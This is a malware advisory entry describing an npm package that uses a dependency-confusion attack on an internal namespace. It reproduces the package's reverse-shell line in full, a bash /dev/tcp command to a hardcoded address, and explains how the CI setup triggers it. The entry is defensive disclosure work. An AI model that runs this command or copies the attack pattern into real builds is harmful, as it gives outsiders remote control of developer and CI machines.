MAL-2026-5613

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (16f3f2c0990e02417fdf7012e6531393e81f786bb16019d0efdb03c049817f90) Package name targets an internal-only namespace and ships a reverse-shell payload. index.js line 5 unconditionally invokes `exec('/bin/bash -c "bash -i >& /dev/tcp/10.0.56.229/443 0>&1"')` inside the first definition of the exported `command` function, opening an interactive shell back to the hardcoded RFC1918 address 10.0.56.229 on port 443. A second assignment to `exports.command` later in the file overwrites the export, but the malicious statement is evaluated whenever the first function body is reached and is shipped verbatim in the published tarball. The package also declares a self-referential dependency on `internallib_v346: ^1.0.0` and includes a.gitlab-ci.yml that runs `npm update --registry http://0.0.0.0:4873/` followed by `node check.js`, where check.js does `require("internallib_v346")`. The naming and CI shape are characteristic of a Birsan-style dependency-confusion attack against an organization's internal `internallib_v346` package: when a victim build resolves from the public registry instead of the internal Verdaccio mirror, the reverse-shell code lands in the developer or CI environment.

## Source: ghsa-malware (49aadd4f032493e7b54abd903b2e970525d80af49a53c3320057385ccbd6da7c) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.